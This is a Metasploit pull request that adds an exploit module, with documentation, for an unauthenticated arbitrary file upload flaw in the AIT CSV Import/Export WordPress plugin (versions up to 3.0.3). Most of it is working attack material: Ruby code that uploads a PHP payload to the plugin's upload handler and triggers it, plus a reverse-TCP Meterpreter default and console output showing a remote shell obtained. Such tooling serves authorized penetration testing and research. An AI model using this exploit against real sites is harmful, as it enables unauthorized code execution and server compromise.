### PR TITLE
Wordpress Plugin: AIT CSV Import / Export RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_ait_csv_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_ait_csv_rce.md
@@ -1,9 +1,9 @@
 ## Vulnerable Application
 
-The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenicated
+The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated
 remote attackers to upload and execute arbitrary PHP code. The
 `upload-handler` does not require authentication, nor validates the
-uploaded content. It may return an error when attempting to parse as
+uploaded content. It may return an error when attempting to parse a
 CSV, however the uploaded shell is left. The shell is uploaded to
 `wp-content/uploads/`.
 

--- a/documentation/modules/exploit/multi/http/wp_ait_csv_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_ait_csv_rce.md
@@ -1,0 +1,55 @@
+## Vulnerable Application
+
+The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenicated
+remote attackers to upload and execute arbitrary PHP code. The
+`upload-handler` does not require authentication, nor validates the
+uploaded content. It may return an error when attempting to parse as
+CSV, however the uploaded shell is left. The shell is uploaded to
+`wp-content/uploads/`.
+
+The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/.
+Once uploaded, the plugin does NOT need to be activated to be exploitable, just installed.
+
+## Verification Steps
+
+1. Install the plugin
+1. Start msfconsole
+1. Do: `use exploits/multi/http/wp_ait_csv_rce`
+1. Do: `set rhost [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.
+
+```
+[*] Processing ait.rb for ERB directives.
+resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
+[*] Using configured payload php/meterpreter/reverse_tcp
+resource (ait.rb)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (ait.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ait.rb)> check
+[*] 2.2.2.2:80 - The target appears to be vulnerable.
+resource (ait.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Uploading payload: W1I6X0.php
+[*] Triggering payload
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
+[+] Deleted W1I6X0.php
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
+Meterpreter : php/linux
+```

--- a/modules/exploits/multi/http/wp_ait_csv_rce.rb
+++ b/modules/exploits/multi/http/wp_ait_csv_rce.rb
@@ -16,9 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'WordPress AIT CSV Import Export Unauthenticated Remote Code Execution',
         'Description' => %q{
-          The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenicated remote attackers to upload and
+          The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and
           execute arbitrary PHP code.  The upload-handler does not require authentication, nor validates
-          the uploaded content.  It may return an error when attempting to parse as CSV, however the
+          the uploaded content.  It may return an error when attempting to parse a CSV, however the
           uploaded shell is left.  The shell is uploaded to wp-content/uploads/.  The plugin is not
           required to be activated to be exploitable.
         },
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
+        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/'])
       ]
     )
   end

--- a/modules/exploits/multi/http/wp_ait_csv_rce.rb
+++ b/modules/exploits/multi/http/wp_ait_csv_rce.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress AIT CSV Import Export Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenicated remote attackers to upload and
+          execute arbitrary PHP code.  The upload-handler does not require authentication, nor validates
+          the uploaded content.  It may return an error when attempting to parse as CSV, however the
+          uploaded shell is left.  The shell is uploaded to wp-content/uploads/.  The plugin is not
+          required to be activated to be exploitable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            # 0day according to wpvdb
+            'h00die', # msf module
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup' ],
+            [ 'WPVDB', '10471' ]
+          ],
+        'Platform' => [ 'php' ],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            [
+              'AIT CSV Import Export <3.0.4',
+              {
+                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+              }
+            ]
+          ],
+        'DisclosureDate' => '2020-11-14', # 0day detected by wpvdb
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
+      ]
+    )
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    # no readme file, just a changelog so we need the version from there
+    changelog = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'changelog.txt')
+    check_version_from_custom_file(changelog, /^v(\d\.\d\.\d),/, '3.0.4')
+  end
+
+  def exploit
+    filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
+    register_file_for_cleanup(filename)
+
+    print_status("Uploading payload: #{filename}")
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'ait-csv-import-export', 'admin', 'upload-handler.php'),
+      'method' => 'POST',
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    print_status('Triggering payload')
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', filename)
+    )
+  end
+end


### PR DESCRIPTION
This PR adds an unauthenticated arbitrary file upload (and thus RCE) for wordpress plugin AIT CSV Import / Export < 3.0.4.

The only real info i can find on it is https://vulners.com/wpvulndb/WPVDB-ID:10471

The plugin is a paid one, no free version, but you may be able to find the vuln version (3.0.3) if you google enough.  Simply install the plugin, don't even need to enable it, and you're good to go!

## Verification

- [ ] Start `msfconsole`
- [ ] Install the plugin
- [ ] Start msfconsole
- [ ] Do: `use exploits/multi/http/wp_ait_csv_rce`
- [ ] Do: `set rhost [ip]`
- [ ] Do: `set lhost [ip]`
- [ ] Do: `run`
- [ ] You should get a shell.

